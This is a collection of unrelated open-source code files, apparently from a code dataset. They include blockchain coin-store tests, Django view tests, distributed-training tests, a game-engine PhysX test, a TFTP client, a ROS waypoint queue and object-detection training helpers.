the-stack_0_19769 | import asyncio
import logging
from pathlib import Path
from typing import List, Optional, Set, Tuple
import aiosqlite
import pytest
from aloe.consensus.block_rewards import calculate_base_farmer_reward, calculate_pool_reward
from aloe.consensus.blockchain import Blockchain, ReceiveBlockResult
from aloe.consensus.coinbase import create_farmer_coin, create_pool_coin
from aloe.full_node.block_store import BlockStore
from aloe.full_node.coin_store import CoinStore
from aloe.full_node.mempool_check_conditions import get_name_puzzle_conditions
from aloe.types.blockchain_format.coin import Coin
from aloe.types.coin_record import CoinRecord
from aloe.types.full_block import FullBlock
from aloe.types.generator_types import BlockGenerator
from aloe.util.generator_tools import tx_removals_and_additions
from aloe.util.ints import uint64, uint32
from aloe.util.wallet_tools import WalletTool
from aloe.util.db_wrapper import DBWrapper
from tests.setup_nodes import bt, test_constants
@pytest.fixture(scope="module")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
constants = test_constants
WALLET_A = WalletTool(constants)
log = logging.getLogger(__name__)
def get_future_reward_coins(block: FullBlock) -> Tuple[Coin, Coin]:
pool_amount = calculate_pool_reward(block.height)
farmer_amount = calculate_base_farmer_reward(block.height)
if block.is_transaction_block():
assert block.transactions_info is not None
farmer_amount = uint64(farmer_amount + block.transactions_info.fees)
pool_coin: Coin = create_pool_coin(
block.height, block.foliage.foliage_block_data.pool_target.puzzle_hash, pool_amount, constants.GENESIS_CHALLENGE
)
farmer_coin: Coin = create_farmer_coin(
block.height,
block.foliage.foliage_block_data.farmer_reward_puzzle_hash,
farmer_amount,
constants.GENESIS_CHALLENGE,
)
return pool_coin, farmer_coin
class TestCoinStore:
@pytest.mark.asyncio
async def test_basic_coin_store(self):
wallet_a = WALLET_A
reward_ph = wallet_a.get_new_puzzlehash()
for cache_size in [0]:
# Generate some coins
blocks = bt.get_consecutive_blocks(
10,
[],
farmer_reward_puzzle_hash=reward_ph,
pool_reward_puzzle_hash=reward_ph,
)
coins_to_spend: List[Coin] = []
for block in blocks:
if block.is_transaction_block():
for coin in block.get_included_reward_coins():
if coin.puzzle_hash == reward_ph:
coins_to_spend.append(coin)
spend_bundle = wallet_a.generate_signed_transaction(1000, wallet_a.get_new_puzzlehash(), coins_to_spend[0])
db_path = Path("fndb_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
db_wrapper = DBWrapper(connection)
coin_store = await CoinStore.create(db_wrapper, cache_size=uint32(cache_size))
blocks = bt.get_consecutive_blocks(
10,
blocks,
farmer_reward_puzzle_hash=reward_ph,
pool_reward_puzzle_hash=reward_ph,
transaction_data=spend_bundle,
)
# Adding blocks to the coin store
should_be_included_prev: Set[Coin] = set()
should_be_included: Set[Coin] = set()
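            # Reward coins created for a block are only included in a *later*
            # transaction block, so we accumulate the expected coins here and
            # compare them against each transaction block's included rewards below.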
for block in blocks:
                pool_coin, farmer_coin = get_future_reward_coins(block)
should_be_included.add(farmer_coin)
should_be_included.add(pool_coin)
if block.is_transaction_block():
if block.transactions_generator is not None:
block_gen: BlockGenerator = BlockGenerator(block.transactions_generator, [])
npc_result = get_name_puzzle_conditions(block_gen, bt.constants.MAX_BLOCK_COST_CLVM, False)
tx_removals, tx_additions = tx_removals_and_additions(npc_result.npc_list)
else:
tx_removals, tx_additions = [], []
assert block.get_included_reward_coins() == should_be_included_prev
await coin_store.new_block(block, tx_additions, tx_removals)
if block.height != 0:
with pytest.raises(Exception):
await coin_store.new_block(block, tx_additions, tx_removals)
for expected_coin in should_be_included_prev:
# Check that the coinbase rewards are added
record = await coin_store.get_coin_record(expected_coin.name())
assert record is not None
assert not record.spent
assert record.coin == expected_coin
for coin_name in tx_removals:
# Check that the removed coins are set to spent
record = await coin_store.get_coin_record(coin_name)
assert record.spent
for coin in tx_additions:
# Check that the added coins are added
record = await coin_store.get_coin_record(coin.name())
assert not record.spent
assert coin == record.coin
should_be_included_prev = should_be_included.copy()
should_be_included = set()
await connection.close()
Path("fndb_test.db").unlink()
@pytest.mark.asyncio
async def test_set_spent(self):
blocks = bt.get_consecutive_blocks(9, [])
for cache_size in [0, 10, 100000]:
db_path = Path("fndb_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
db_wrapper = DBWrapper(connection)
coin_store = await CoinStore.create(db_wrapper, cache_size=uint32(cache_size))
# Save/get block
for block in blocks:
if block.is_transaction_block():
removals, additions = [], []
await coin_store.new_block(block, additions, removals)
coins = block.get_included_reward_coins()
records = [await coin_store.get_coin_record(coin.name()) for coin in coins]
for record in records:
await coin_store._set_spent(record.coin.name(), block.height)
with pytest.raises(AssertionError):
await coin_store._set_spent(record.coin.name(), block.height)
records = [await coin_store.get_coin_record(coin.name()) for coin in coins]
for record in records:
assert record.spent
assert record.spent_block_index == block.height
await connection.close()
Path("fndb_test.db").unlink()
@pytest.mark.asyncio
async def test_rollback(self):
blocks = bt.get_consecutive_blocks(20)
for cache_size in [0, 10, 100000]:
db_path = Path("fndb_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
db_wrapper = DBWrapper(connection)
coin_store = await CoinStore.create(db_wrapper, cache_size=uint32(cache_size))
for block in blocks:
if block.is_transaction_block():
removals, additions = [], []
await coin_store.new_block(block, additions, removals)
coins = block.get_included_reward_coins()
records: List[Optional[CoinRecord]] = [
await coin_store.get_coin_record(coin.name()) for coin in coins
]
for record in records:
await coin_store._set_spent(record.coin.name(), block.height)
records: List[Optional[CoinRecord]] = [
await coin_store.get_coin_record(coin.name()) for coin in coins
]
for record in records:
assert record.spent
assert record.spent_block_index == block.height
reorg_index = 8
await coin_store.rollback_to_block(reorg_index)
for block in blocks:
if block.is_transaction_block():
coins = block.get_included_reward_coins()
records: List[Optional[CoinRecord]] = [
await coin_store.get_coin_record(coin.name()) for coin in coins
]
if block.height <= reorg_index:
for record in records:
assert record is not None
assert record.spent
else:
for record in records:
assert record is None
await connection.close()
Path("fndb_test.db").unlink()
@pytest.mark.asyncio
async def test_basic_reorg(self):
for cache_size in [0, 10, 100000]:
initial_block_count = 30
reorg_length = 15
blocks = bt.get_consecutive_blocks(initial_block_count)
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
db_wrapper = DBWrapper(connection)
coin_store = await CoinStore.create(db_wrapper, cache_size=uint32(cache_size))
store = await BlockStore.create(db_wrapper)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
try:
for block in blocks:
await b.receive_block(block)
assert b.get_peak().height == initial_block_count - 1
for c, block in enumerate(blocks):
if block.is_transaction_block():
coins = block.get_included_reward_coins()
records: List[Optional[CoinRecord]] = [
await coin_store.get_coin_record(coin.name()) for coin in coins
]
for record in records:
assert not record.spent
assert record.confirmed_block_index == block.height
assert record.spent_block_index == 0
blocks_reorg_chain = bt.get_consecutive_blocks(
reorg_length, blocks[: initial_block_count - 10], seed=b"2"
)
for reorg_block in blocks_reorg_chain:
result, error_code, _ = await b.receive_block(reorg_block)
print(f"Height {reorg_block.height} {initial_block_count - 10} result {result}")
if reorg_block.height < initial_block_count - 10:
assert result == ReceiveBlockResult.ALREADY_HAVE_BLOCK
elif reorg_block.height < initial_block_count - 1:
assert result == ReceiveBlockResult.ADDED_AS_ORPHAN
elif reorg_block.height >= initial_block_count:
assert result == ReceiveBlockResult.NEW_PEAK
if reorg_block.is_transaction_block():
coins = reorg_block.get_included_reward_coins()
records: List[Optional[CoinRecord]] = [
await coin_store.get_coin_record(coin.name()) for coin in coins
]
for record in records:
assert not record.spent
assert record.confirmed_block_index == reorg_block.height
assert record.spent_block_index == 0
assert error_code is None
assert b.get_peak().height == initial_block_count - 10 + reorg_length - 1
except Exception as e:
await connection.close()
Path("blockchain_test.db").unlink()
b.shut_down()
raise e
await connection.close()
Path("blockchain_test.db").unlink()
b.shut_down()
@pytest.mark.asyncio
async def test_get_puzzle_hash(self):
for cache_size in [0, 10, 100000]:
num_blocks = 20
farmer_ph = 32 * b"0"
pool_ph = 32 * b"1"
blocks = bt.get_consecutive_blocks(
num_blocks,
farmer_reward_puzzle_hash=farmer_ph,
pool_reward_puzzle_hash=pool_ph,
guarantee_transaction_block=True,
)
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
db_wrapper = DBWrapper(connection)
coin_store = await CoinStore.create(db_wrapper, cache_size=uint32(cache_size))
store = await BlockStore.create(db_wrapper)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
for block in blocks:
res, err, _ = await b.receive_block(block)
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
assert b.get_peak().height == num_blocks - 1
            coins_farmer = await coin_store.get_coin_records_by_puzzle_hash(True, farmer_ph)
            coins_pool = await coin_store.get_coin_records_by_puzzle_hash(True, pool_ph)
assert len(coins_farmer) == num_blocks - 2
assert len(coins_pool) == num_blocks - 2
await connection.close()
Path("blockchain_test.db").unlink()
b.shut_down()
|
the-stack_0_19770 | import pytest
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.models import AnonymousUser
from django.contrib.messages.middleware import MessageMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.http import HttpRequest
from django.test import RequestFactory
from django.urls import reverse
from pedagogy_manager.users.forms import UserChangeForm
from pedagogy_manager.users.models import User
from pedagogy_manager.users.tests.factories import UserFactory
from pedagogy_manager.users.views import (
UserRedirectView,
UserUpdateView,
user_detail_view,
)
pytestmark = pytest.mark.django_db
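# Apply the django_db mark to every test in this module so each test gets database access.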
class TestUserUpdateView:
"""
TODO:
extracting view initialization code as class-scoped fixture
would be great if only pytest-django supported non-function-scoped
fixture db access -- this is a work-in-progress for now:
https://github.com/pytest-dev/pytest-django/pull/258
"""
def dummy_get_response(self, request: HttpRequest):
return None
def test_get_success_url(self, user: User, rf: RequestFactory):
view = UserUpdateView()
request = rf.get("/fake-url/")
request.user = user
view.request = request
assert view.get_success_url() == f"/users/{user.username}/"
def test_get_object(self, user: User, rf: RequestFactory):
view = UserUpdateView()
request = rf.get("/fake-url/")
request.user = user
view.request = request
assert view.get_object() == user
def test_form_valid(self, user: User, rf: RequestFactory):
view = UserUpdateView()
request = rf.get("/fake-url/")
# Add the session/message middleware to the request
SessionMiddleware(self.dummy_get_response).process_request(request)
MessageMiddleware(self.dummy_get_response).process_request(request)
request.user = user
view.request = request
# Initialize the form
form = UserChangeForm()
form.cleaned_data = []
view.form_valid(form)
messages_sent = [m.message for m in messages.get_messages(request)]
assert messages_sent == ["Information successfully updated"]
class TestUserRedirectView:
def test_get_redirect_url(self, user: User, rf: RequestFactory):
view = UserRedirectView()
request = rf.get("/fake-url")
request.user = user
view.request = request
assert view.get_redirect_url() == f"/users/{user.username}/"
class TestUserDetailView:
def test_authenticated(self, user: User, rf: RequestFactory):
request = rf.get("/fake-url/")
request.user = UserFactory()
response = user_detail_view(request, username=user.username)
assert response.status_code == 200
def test_not_authenticated(self, user: User, rf: RequestFactory):
request = rf.get("/fake-url/")
request.user = AnonymousUser()
response = user_detail_view(request, username=user.username)
login_url = reverse(settings.LOGIN_URL)
assert response.status_code == 302
assert response.url == f"{login_url}?next=/fake-url/"
|
the-stack_0_19772 | import os
from os import PathLike
from typing import Union, Dict, Optional
import torch
from torch.cuda import amp
from torch.testing import assert_allclose
import pytest
from allennlp.common.testing import AllenNlpTestCase, run_distributed_test, requires_multi_gpu
from allennlp.nn.util import load_state_dict_distributed
from allennlp.nn.parallel import (
FairScaleFsdpAccelerator,
FairScaleFsdpWrappedModel,
ShardedModuleMixin,
)
class EncoderDecoderModel(torch.nn.Module):
"""
Simple model to use for testing. We use an encoder-decoder architecture with tied
embeddings to make sure we cover enough edge cases.
"""
def __init__(self, fsdp_wrapper: FairScaleFsdpAccelerator) -> None:
super().__init__()
self.embedding = torch.nn.Embedding(12, 4)
self.emb_proj = fsdp_wrapper.wrap_module(torch.nn.Linear(4, 4))
self.encoder = fsdp_wrapper.wrap_module(Encoder())
self.decoder = Decoder(self.embedding, fsdp_wrapper)
# Add a buffer to make sure these are handled correctly. We don't actually
# do anything with this though.
self.register_buffer("buffer", torch.randn(4, 4))
def tie_weights(self):
"""
        Should be called after loading a state dict to make sure the embedding weights are tied.
"""
self.decoder.linear.weight = self.embedding.weight
def forward(self, x):
x = self.embedding(x)
x = self.emb_proj(x)
x = self.encoder(x)
x = self.decoder(x)
return x
class Encoder(torch.nn.Module):
def __init__(self) -> None:
super().__init__()
self.ff1 = FeedForward()
self.ff2 = FeedForward()
# Add a buffer to make sure these are handled correctly. We don't actually
# do anything with this though.
self.register_buffer("buffer", torch.randn(4, 4))
def forward(self, x):
return self.ff2(self.ff1(x))
class Decoder(torch.nn.Module):
def __init__(
self, embedding: torch.nn.Embedding, fsdp_wrapper: FairScaleFsdpAccelerator
) -> None:
super().__init__()
self.ff = fsdp_wrapper.wrap_module(FeedForward())
# Don't want to wrap this linear layer since we are tying the weights to the embedding.
self.linear = torch.nn.Linear(4, 12, bias=False)
self.linear.weight = embedding.weight
# Add a buffer to make sure these are handled correctly. We don't actually
# do anything with this though.
self.register_buffer("buffer", torch.randn(4, 4))
def forward(self, x):
return self.linear(self.ff(x))
class FeedForward(torch.nn.Module):
def __init__(self) -> None:
super().__init__()
self.linear = torch.nn.Linear(4, 4)
self.activation = torch.nn.ReLU()
def forward(self, x):
return self.activation(self.linear(x))
def _dist_load_and_train(
global_rank: int,
world_size: int,
gpu_id: int,
test_dir: Union[str, PathLike],
mixed_precision: bool,
**kwargs,
):
# make sure everything is deterministic.
torch.manual_seed(global_rank)
fsdp_wrapper = FairScaleFsdpAccelerator(
local_rank=global_rank,
world_size=world_size,
cuda_device=gpu_id,
mixed_precision=mixed_precision,
**kwargs,
)
model = EncoderDecoderModel(fsdp_wrapper)
state_dict: Optional[Dict[str, torch.Tensor]] = None
if global_rank == 0:
embedding_weight = torch.randn(12, 4)
state_dict = {
"embedding.weight": embedding_weight,
"emb_proj.weight": torch.randn(4, 4),
"emb_proj.bias": torch.randn(4),
"encoder.ff1.linear.weight": torch.randn(4, 4),
"encoder.ff1.linear.bias": torch.randn(4),
"encoder.ff2.linear.weight": torch.randn(4, 4),
"encoder.ff2.linear.bias": torch.randn(4),
"encoder.buffer": torch.randn(4, 4),
"decoder.ff.linear.weight": torch.randn(4, 4),
"decoder.ff.linear.bias": torch.randn(4),
"decoder.linear.weight": embedding_weight,
"decoder.buffer": torch.randn(4, 4),
"buffer": torch.randn(4, 4),
}
torch.save(state_dict, os.path.join(test_dir, "state.pt"))
# Make sure the right modules are sharded.
assert not isinstance(model.embedding, ShardedModuleMixin)
assert isinstance(model.encoder, ShardedModuleMixin)
assert isinstance(model.decoder.ff, ShardedModuleMixin)
# Now load the state dict... we should be able to do this before wrapping the model itself
# with the fsdp_wrapper.
missing_keys, unexpected_keys = load_state_dict_distributed(model, state_dict)
assert not missing_keys
assert not unexpected_keys
# Make sure weights are still tied.
model.tie_weights()
# Now wrap outer model.
model, wrapped_model = fsdp_wrapper.wrap_model(model)
# TODO: grad scaler doesn't work now due to https://github.com/facebookresearch/fairscale/issues/421.
# scaler = wrapped_model.init_grad_scaler()
scaler: Optional[amp.GradScaler] = None
# Checkpoint each worker's state.
worker_state = wrapped_model.state_dict()
for name, value in worker_state["weights"].items():
# Each tensor should be on the current device if mixed_precision is `False`,
# otherwise they will be on CPU (since we set `move_params_to_cpu`).
if mixed_precision:
assert value.device == torch.device("cpu")
else:
assert value.device == torch.device(gpu_id)
# Either way, tensors returned should be full precision.
assert value.dtype == torch.float, f"{name} is {value.dtype}"
# Save state dict from each worker.
torch.save(worker_state, os.path.join(test_dir, f"state_worker{gpu_id}.pt"))
# Now we'll make sure we can successfully do a forward pass, backward pass, and optimizer step.
optim = torch.optim.Adam(wrapped_model.model.parameters(), lr=0.0001)
x = torch.randint(12, (2, 6)).to(torch.device(gpu_id))
# Do a forward pass.
with amp.autocast(enabled=mixed_precision):
x = wrapped_model.model(x)
loss = x.sum()
# And a backwards pass + optimizer step.
if scaler is not None:
scaler.scale(loss).backward()
scaler.step(optim)
scaler.update()
else:
loss.backward()
optim.step()
# Now save final state.
torch.save(wrapped_model.state_dict(), os.path.join(test_dir, f"final_state_worker{gpu_id}.pt"))
class TestFairScaleFsdpAccelerator(AllenNlpTestCase):
@pytest.mark.parametrize(
"mixed_precision",
(True, False),
ids=lambda val: f"amp={val}",
)
@pytest.mark.parametrize(
"flatten_parameters",
(True, False),
ids=lambda val: f"flatten={val}",
)
@requires_multi_gpu
def test_distributed_loading_and_training(self, mixed_precision, flatten_parameters):
run_distributed_test(
[0, 1],
func=_dist_load_and_train,
test_dir=self.TEST_DIR,
mixed_precision=mixed_precision,
flatten_parameters=flatten_parameters,
)
# Now make sure the sharded saved state is exactly the same as the original state when consolidated.
original_state = torch.load(self.TEST_DIR / "state.pt", map_location="cpu")
consolidated_state = FairScaleFsdpWrappedModel.consolidate_sharded_state(
[
self.TEST_DIR / "state_worker0.pt",
self.TEST_DIR / "state_worker1.pt",
]
)
assert set(original_state.keys()) - set(consolidated_state.keys()) == {
"decoder.linear.weight" # won't be in the state dict since param is tied to embedding.weight
}
for key, tensor0 in original_state.items():
if key not in consolidated_state:
continue
# Need to give extra tolerance for buffers when `mixed_precision` is `True`.
tolerance = None if not mixed_precision or "buffer" not in key else 1e-3
tensor1 = consolidated_state[key]
assert_allclose(
tensor0,
tensor1,
msg=f"{key} is off in consolidated state.\nExpected:\n{tensor0}\nGot:\n{tensor1}",
atol=tolerance,
rtol=tolerance,
)
|
the-stack_0_19773 | """
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
Test case ID : C14861504
Test Case Title : Verify if Rendering Mesh does not have a PhysX Collision Mesh fbx, then PxMesh is not auto-assigned
"""
# fmt: off
class Tests():
create_entity = ("Created test entity", "Failed to create test entity")
mesh_added = ("Added Mesh component", "Failed to add Mesh component")
physx_collider_added = ("Added PhysX Collider component", "Failed to add PhysX Collider component")
assign_mesh_asset = ("Assigned Mesh asset to Mesh component", "Failed to assign mesh asset to Mesh component")
shape_not_assigned = ("Shape is not auto assigned", "Shape auto assigned unexpectedly")
enter_game_mode = ("Entered game mode", "Failed to enter game mode")
warnings_found = ("Warnings found in logs", "No warnings found in logs")
# fmt: on
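# Each Tests entry is a (pass message, fail message) pair consumed by Report.result below.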
def C14861504_RenderMeshAsset_WithNoPxAsset():
"""
Summary:
Create entity with Mesh component and assign a render mesh that has no physics asset to the Mesh component.
Add Physics Collider component and Verify that the physics mesh asset is not auto-assigned.
Expected Behavior:
Following warning is logged in Game mode:
"(PhysX) - EditorColliderComponent::BuildGameEntity. No asset assigned to Collider Component. Entity: <Entity Name>"
Test Steps:
1) Load the empty level
2) Create an entity
3) Add Mesh component
4) Assign a render mesh asset to Mesh component (the fbx mesh having only Static mesh and no PxMesh)
5) Add PhysX Collider component
6) The physics asset in PhysX Collider component is not auto-assigned.
7) Enter GameMode and check for warnings
Note:
- This test file must be called from the Open 3D Engine Editor command terminal
- Any passed and failed tests are written to the Editor.log file.
Parsing the file or running a log_monitor are required to observe the test results.
:return: None
"""
# Builtins
import os
# Helper Files
from editor_python_test_tools.editor_entity_utils import EditorEntity as Entity
from editor_python_test_tools.utils import Report
from editor_python_test_tools.utils import TestHelper as helper
from editor_python_test_tools.utils import Tracer
from editor_python_test_tools.asset_utils import Asset
# Open 3D Engine Imports
import azlmbr.asset as azasset
# Asset paths
STATIC_MESH = os.path.join("assets", "c14861504_rendermeshasset_withnopxasset", "test_asset.azmodel")
helper.init_idle()
# 1) Load the empty level
helper.open_level("Physics", "Base")
# 2) Create an entity
test_entity = Entity.create_editor_entity("test_entity")
Report.result(Tests.create_entity, test_entity.id.IsValid())
# 3) Add Mesh component
mesh_component = test_entity.add_component("Mesh")
Report.result(Tests.mesh_added, test_entity.has_component("Mesh"))
    # 4) Assign a render mesh asset to Mesh component (the fbx mesh having only a Static mesh and no PxMesh)
mesh_asset = Asset.find_asset_by_path(STATIC_MESH)
mesh_component.set_component_property_value("Controller|Configuration|Mesh Asset", mesh_asset.id)
mesh_asset.id = mesh_component.get_component_property_value("Controller|Configuration|Mesh Asset")
Report.result(Tests.assign_mesh_asset, mesh_asset.get_path() == STATIC_MESH.replace(os.sep, "/"))
# 5) Add PhysX Collider component
test_component = test_entity.add_component("PhysX Collider")
Report.result(Tests.physx_collider_added, test_entity.has_component("PhysX Collider"))
# 6) The physics asset in PhysX Collider component is not auto-assigned.
asset_id = test_component.get_component_property_value("Shape Configuration|Asset|PhysX Mesh")
# Comparing asset_id with Null/Invalid asset azlmbr.asset.AssetId() to check that asset is not auto assigned
Report.result(Tests.shape_not_assigned, asset_id == azasset.AssetId())
# 7) Enter GameMode and check for warnings
with Tracer() as section_tracer:
helper.enter_game_mode(Tests.enter_game_mode)
    # Check that warnings exist and that the expected warning was caught in the log
Report.result(Tests.warnings_found, section_tracer.has_warnings)
if __name__ == "__main__":
from editor_python_test_tools.utils import Report
Report.start_test(C14861504_RenderMeshAsset_WithNoPxAsset)
|
the-stack_0_19776 | import socket
import os
import struct
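# TFTP opcodes (RFC 1350), sent as 2-byte big-endian prefixes below:
#   \x00\x01 RRQ (read), \x00\x02 WRQ (write), \x00\x03 DATA,
#   \x00\x04 ACK, \x00\x05 ERROR.
# DATA blocks carry at most 512 bytes; a shorter block ends the transfer.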
def put(client, filename, addr):
#file_path = os.path.abspath(filename)
try:
open_file = open(filename, 'rb')
except FileNotFoundError:
        print(filename + " cannot be opened. Maybe the file does not exist")
return
title = b'\x00\x02' + filename.encode()+b'\x00'+"octet".encode()+b'\x00'
client.sendto(title, addr)
block = 0
while True:
data, sock = client.recvfrom(65536)
req = data[0:2]
if req == b'\x00\x04':
curr_block = struct.unpack('!H', data[2:4])[0]
if curr_block != block:
continue
curr_block += 1
if curr_block == 65536:
curr_block = 0
read_data = open_file.read(512)
curr_pack = b'\x00\x03'+struct.pack(b'!H', curr_block)+read_data
client.sendto(curr_pack, addr)
block += 1
if block == 65536:
block = 0
if len(read_data) < 512:
open_file.close()
print("Done")
break
elif req == b'\x00\x05':
print(data)
break
def get(client, filename, addr):
file_path = os.path.abspath("server_"+filename)
if os.path.isfile(file_path):
file_path = os.path.abspath(change_filename(filename))
curr_pack = b'\x00\x01'+filename.encode()+b'\x00'+'octet'.encode()+b'\x00'
client.sendto(curr_pack, addr)
create_file = open(file_path, 'wb')
block = 1
while True:
try:
data, sock = client.recvfrom(65536)
req = data[0:2]
except socket.timeout:
client.sendto(curr_pack, addr)
print("Timeout")
create_file.close()
os.remove(create_file.name)
break
if req == b'\x00\x03':
curr_block = struct.unpack('!H', data[2:4])[0]
read_data = data[4:]
if curr_block != block:
continue
block += 1
if block == 65536:
block = 1
create_file.write(read_data)
curr_pack = b'\x00\x04'+struct.pack(b'!H', curr_block)
client.sendto(curr_pack, addr)
if len(read_data) < 512:
print("Done")
create_file.close()
break
elif req == b'\x00\x05':
print(data)
create_file.close()
os.remove(file_path)
break
def change_filename(filename):
n = 1
file = str(n) + '_server_' + filename
while True:
if os.path.isfile(file):
n += 1
file = str(n) + '_server_' + filename
else:
break
return file
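# e.g. for "a.txt" this tries "1_server_a.txt", "2_server_a.txt", ... until an unused name is found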
def main():
SERVER = "127.0.0.1"
PORT = 69
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
inp_req = input("Enter command: ")
req = str(inp_req).lower().split()
if len(req) == 1:
if req[0] == "--help":
print("Enter get filename to download or put filename to upload")
else:
print("Wrong command. Try again")
elif len(req) == 2:
if req[0] == "get":
get(client, req[1], (SERVER, PORT))
elif req[0] == "put":
put(client, req[1], (SERVER, PORT))
else:
print("Wrong command. Try again")
else:
print("Wrong command. Try again")
if __name__ == '__main__':
    main()
|
the-stack_0_19778 | #!/usr/bin/env python
import rospy
from MoveAction import MoveAction
from geometry_msgs.msg import PoseStamped
#--- "TMA WatPoints" for delivery at many places using Queue to store and control plan by priority [First In, First Out]
class WayPoints:
#--- Initialize the Queue for storing the list of points to delivery -----------------------------------------------
def __init__(self):
self.plan = list()
self.currentMoveId = ""
    #--- Take elements from the queue and drive the robot to each delivery target --------------------------------------
def delivery(self):
        n = 0 #--- Counter for the number of goals delivered -----------------------------------------
while not self.isEmpty():
#--- pick the first element of the queue -------------------------------------------------------------------
self.currentMoveAction = self.poll()
self.currentMoveId = self.currentMoveAction.moveId
#-----------------------------------------------------------------------------------------------------------
self.allMoveId()
#--- let the robot move to target --------------------------------------------------------------------------
result = self.currentMoveAction.move_to_goal()
n += 1
if result:
rospy.loginfo("------ Goal reached the number %s ------\n", (n+1))
#--- The function put one element to the right of queue :: ------------------------------------------------------
def add(self, element):
self.plan.append(element)
self.allMoveId()
    #--- Remove and return the head of the queue; return None if the queue is empty ------------------------------------
def poll(self):
result = None
if self.size() > 0:
result = self.plan[0]
del self.plan[0]
return result
#--- The function cancel an element of queue by id -----------------------------------------------------------------
def cancel(self, elementId):
#--- The cancel action is the current move -> we cancel this ---------------------------------------------------
tb = "\n#####----- Want to delete ["+elementId.data+"] Current ID ["+self.currentMoveId+"] -----#####\n"
if (self.currentMoveId == elementId.data):
self.currentMoveAction.cancel()
else:
x = self.getElementById(elementId) #--- Find the MoveAction by Id in the plan ---------------------
if x is not None:
self.plan.remove(x) #--- Remove this action from the plan --------------------------
rospy.loginfo(tb + "#####-----------------------------------------------------------#####\n")
self.allMoveId()
    #--- Display all MoveIds in the waypoint plan ----------------------------------------------------------------------
def allMoveId(self):
s = "All of MoveId in plan \n ------- " if self.size()>0 else "The delivery plan is empty"
for i in self.plan:
s = s + "[" + i.moveId + "] "
rospy.loginfo(s+"------- \n")
    #--- Return an element by ID, or None if it does not exist in this plan --------------------------------------------
def getElementById(self, elementId):
result = None
for x in self.plan:
if (x.moveId == elementId.data):
result = x
break
return result
    #--- Check whether the MoveAction already exists in the delivery plan ----------------------------------------------
def isExist(self, x):
result = False
for i in self.plan:
result = (i.moveId == x.moveId)
if result:
                break
return result
    #--- Return True if the queue is empty -----------------------------------------------------------------------------
def isEmpty(self):
return (self.size() == 0)
#--- Return size of the plan queue ---------------------------------------------------------------------------------
def size(self):
return len(self.plan)
|
the-stack_0_19783 | import math
import sys
import time
import torch
import torchvision.models.detection.mask_rcnn
import utils
from coco_eval import CocoEvaluator
from coco_utils import get_coco_api_from_dataset
def train_one_epoch(model, optimizer, data_loader, device, epoch, print_freq, scaler=None):
model.train()
metric_logger = utils.MetricLogger(delimiter=" ")
metric_logger.add_meter("lr", utils.SmoothedValue(window_size=1, fmt="{value:.6f}"))
header = f"Epoch: [{epoch}]"
lr_scheduler = None
if epoch == 0:
warmup_factor = 1.0 / 1000
warmup_iters = min(1000, len(data_loader) - 1)
lr_scheduler = torch.optim.lr_scheduler.LinearLR(
optimizer, start_factor=warmup_factor, total_iters=warmup_iters
)
for images, targets in metric_logger.log_every(data_loader, print_freq, header):
try:
images = list(image.to(device) for image in images)
targets = [{k: v.to(device) for k, v in t.items()} for t in targets]
with torch.cuda.amp.autocast(enabled=scaler is not None):
loss_dict = model(images, targets)
losses = sum(loss for loss in loss_dict.values())
# reduce losses over all GPUs for logging purposes
loss_dict_reduced = utils.reduce_dict(loss_dict)
losses_reduced = sum(loss for loss in loss_dict_reduced.values())
loss_value = losses_reduced.item()
if not math.isfinite(loss_value):
print(f"Loss is {loss_value}, stopping training")
print(loss_dict_reduced)
sys.exit(1)
except Exception as exp:
print("ERROR", str(exp))
torch.save({'img': images, 'targets': targets}, 'error_causing_batch.pth')
raise RuntimeError
optimizer.zero_grad()
if scaler is not None:
scaler.scale(losses).backward()
scaler.step(optimizer)
scaler.update()
else:
losses.backward()
optimizer.step()
if lr_scheduler is not None:
lr_scheduler.step()
metric_logger.update(loss=losses_reduced, **loss_dict_reduced)
metric_logger.update(lr=optimizer.param_groups[0]["lr"])
return metric_logger
def _get_iou_types(model):
model_without_ddp = model
if isinstance(model, torch.nn.parallel.DistributedDataParallel):
model_without_ddp = model.module
iou_types = ["bbox"]
if isinstance(model_without_ddp, torchvision.models.detection.MaskRCNN):
iou_types.append("segm")
if isinstance(model_without_ddp, torchvision.models.detection.KeypointRCNN):
iou_types.append("keypoints")
return iou_types
@torch.inference_mode()
def evaluate(model, data_loader, device, iou_types=None):
n_threads = torch.get_num_threads()
# FIXME remove this and make paste_masks_in_image run on the GPU
torch.set_num_threads(1)
cpu_device = torch.device("cpu")
model.eval()
metric_logger = utils.MetricLogger(delimiter=" ")
header = "Test:"
coco = get_coco_api_from_dataset(data_loader.dataset)
if iou_types is None:
iou_types = _get_iou_types(model)
coco_evaluator = CocoEvaluator(coco, iou_types)
for images, targets in metric_logger.log_every(data_loader, 100, header):
images = list(img.to(device) for img in images)
if torch.cuda.is_available():
torch.cuda.synchronize()
model_time = time.time()
outputs = model(images)
outputs = [{k: v.to(cpu_device) for k, v in t.items()} for t in outputs]
model_time = time.time() - model_time
res = {target["image_id"].item(): output for target, output in zip(targets, outputs)}
evaluator_time = time.time()
coco_evaluator.update(res)
evaluator_time = time.time() - evaluator_time
metric_logger.update(model_time=model_time, evaluator_time=evaluator_time)
# gather the stats from all processes
metric_logger.synchronize_between_processes()
print("Averaged stats:", metric_logger)
coco_evaluator.synchronize_between_processes()
# accumulate predictions from all images
coco_evaluator.accumulate()
coco_evaluator.summarize()
torch.set_num_threads(n_threads)
return coco_evaluator
|
the-stack_0_19785 | #!/usr/bin/env python
#
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
